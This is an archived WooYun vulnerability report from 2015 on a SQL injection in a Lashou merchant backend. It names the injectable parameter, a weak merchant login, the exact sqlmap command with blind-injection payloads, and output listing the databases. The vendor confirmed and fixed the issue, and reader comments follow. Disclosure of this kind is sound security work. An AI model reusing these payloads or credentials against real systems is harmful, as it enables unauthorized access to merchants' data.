拉手网某重要站点SQL注射_ROOT权限

编号123577
Urlhttp://www.wooyun.org/bug.php?action=view&id=123577
漏洞状态厂商已经修复
漏洞标题拉手网某重要站点SQL注射_ROOT权限
漏洞类型SQL注射漏洞
厂商拉手网
白帽子Jannock
提交日期2015-06-29 22:54:00
公开日期2015-07-09 11:29:00
修复时间2015-07-09 11:29:00
确认时间2015-06-30 00:00:00
Confirm Spend1
漏洞标签php+数字类型注射
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank18
漏洞简介
拉手网某重要站点SQL注射_ROOT权限,全库信息。
漏洞细节

首先看到 WooYun: 拉手网商家后台设计不当可探测大量弱口令账号(影响商家结账与提现敏感信息)
随便登陆了一个,这里是 fengzhen 123456
然后转到cg.lashou.com 后台也是随便找到一处SQL注入
估计有多处,请自行检测。
http://cg.lashou.com/new_index.php?class=Stat&goods_id=10121973&fd_id=39355
fd_id 存在SQL注入
注入数据中包含商家的全库信息。

POC

python sqlmap.py -r 1.txt -p fd_id --dbms=mysql --technique=B --prefix "39355 and 1=if((1=1" --suffix "),1,(select 1 union select 2))" --threads 5 --dbs
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150629}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 22:45:22
1.txt
[22:45:22] [INFO] parsing HTTP request from '1.txt'
1.txt
[22:45:22] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Parameter: fd_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: class=Stat&goods_id=10121973&fd_id=39355 and 1=if((1=1 AND 4480=448
0),1,(select 1 union select 2))
---


available databases [16]:
[*] ho***********
[*] hu***********
[*] in***********
[*] la***********
[*] la***********
[*] la***********
[*] la***********
[*] la***********
[*] la***********
[*] lo***********
[*] my***********
[*] my***********
[*] pe***********
[*] st***********
[*] te***********
[*] th***********

1.png

修复方案

过滤

状态信息 2015-06-29: 细节已通知厂商并且等待厂商处理中
2015-06-30: 厂商已经确认,细节仅向厂商公开
2015-07-09: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复谢谢您的报告.我们已经将问题告知研发,现已讨论处理中.希望你持续关注.万福.
回应信息危害等级:高漏洞Rank:18 确认时间:2015-06-30 09:34
Showing 1-10 of 10 items.
评论内容评论人点赞数评论时间

我是第666个关注一哥的人

泡泡堂02015-06-30 16:05:00

@浩天 怎么论坛进不去了 一直提示密码错误

牛 小 帅02015-06-30 09:45:00

希望你持续关注

浩天02015-06-30 09:35:00

@xsser 怎么论坛登入不了啦?

牛 小 帅02015-06-30 09:10:00

全库 root !!

zzR02015-06-30 01:04:00

一哥又满血复活了

李旭敏02015-06-29 23:45:00

一哥又复活了

李旭敏02015-06-29 23:44:00

刷刷刷

qhwlpg02015-06-29 23:06:00

一哥这么晚了还刷

hh201402015-06-29 23:00:00

难道是沙发?

子非海绵宝宝02015-06-29 22:57:00